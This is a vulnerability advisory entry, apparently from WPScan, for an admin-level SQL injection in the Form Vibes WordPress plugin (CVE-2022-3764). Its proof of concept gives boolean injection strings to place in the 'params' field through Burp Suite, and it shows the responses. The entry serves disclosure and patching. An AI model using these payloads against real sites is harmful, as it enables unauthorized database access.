Lucene search
Nguyen Duy Quoc KhanhWPVDB-ID:9D49DF6B-E2F1-4662-90D2-84C29C3B1CB0HistoryNov 08, 2022 - 12:00 a.m.
Form Vibes < 1.4.5 - Admin+ SQLi
2022-11-0800:00:00
Nguyen Duy Quoc Khanh
wpscan.com
6
form vibes
sql injection
admin+
burp suite
contact form 7
0.001 Low
EPSS
Percentile
19.5%
The “delete_entries” function does not filter parameters from the request. This leads to an SQL Injection vulnerability.
PoC
- Create a submission using the Contact From 7 plugin. - On the Form Vibes tab in the dashboard, click “submissions” and implement the delete function on an entry. - Intercept the request and send it to repeater in Burp suite. - Change the parameter “params” to: {“ids”:[“9) AND (1=2);-- -”]} - Send the request, we get this response: {“status”:“failed”,“message”:“Could not able to delete Entries”} - Change the parameter “params” to: {“ids”:[“9) AND (1=1);-- -”]} - Send the request, the response this time is the following: {“status”:“passed”,“message”:“Entries Deleted”}
| CPE | Name | Operator | Version |
|---|---|---|---|
| form-vibes | lt | 1.4.6 |
Related
cve
cve
CVE-2022-3764
2024-01-16 16:15:10
prion
prion
Sql injection
2024-01-16 16:15:00
cvelist
cvelist
CVE-2022-3764 Form Vibes < 1.4.5 - Admin+ SQLi
2024-01-16 15:50:50
wpexploit
wpexploit
Form Vibes < 1.4.5 - Admin+ SQLi
2022-11-08 00:00:00
nvd
nvd
CVE-2022-3764
2024-01-16 16:15:10